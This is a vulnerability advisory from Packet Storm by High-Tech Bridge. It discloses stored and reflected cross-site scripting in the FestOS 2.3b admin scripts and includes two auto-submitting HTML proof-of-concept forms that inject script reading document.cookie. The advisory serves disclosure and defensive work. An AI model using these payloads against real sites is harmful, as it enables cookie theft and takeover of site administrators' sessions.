FestOS 2.3b Cross Site Scripting

2010-07-16T00:00:00
ID PACKETSTORM:91854
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-07-16T00:00:00

Description

                                        
                                            `Vulnerability ID: HTB22473  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos_1.html  
Product: FestOS  
Vendor: Skypanther Studios, Inc ( http://festengine.org/ )   
Vulnerable Version: 2.3b and Probably Prior Versions  
Vendor Notification: 01 July 2010   
Vulnerability Type: Stored XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/admin/do_snippets_edit.php" script to properly sanitize user-supplied input in "contents" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" >  
<input type="hidden" name="snippetID" value="1" />  
<input type="hidden" name="title" value="Site footer" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' />  
</form>  
  
<script>  
document.main.submit();  
</script>  
  
  
Vulnerability ID: HTB22472  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos.html  
Product: FestOS  
Vendor: Skypanther Studios, Inc ( http://festengine.org/ )   
Vulnerable Version: 2.3b and Probably Prior Versions  
Vendor Notification: 01 July 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/admin/do_pages_edit.php" script to properly sanitize user-supplied input in "title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin/do_pages_edit.php" method="post" name="main" >  
<input type="hidden" name="pageID" value="2" />  
<input type="hidden" name="title" value='title"><script>alert(document.cookie)</script>' />  
<input type="hidden" name="alias" value="home" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="contents" value='page content here...' />  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
`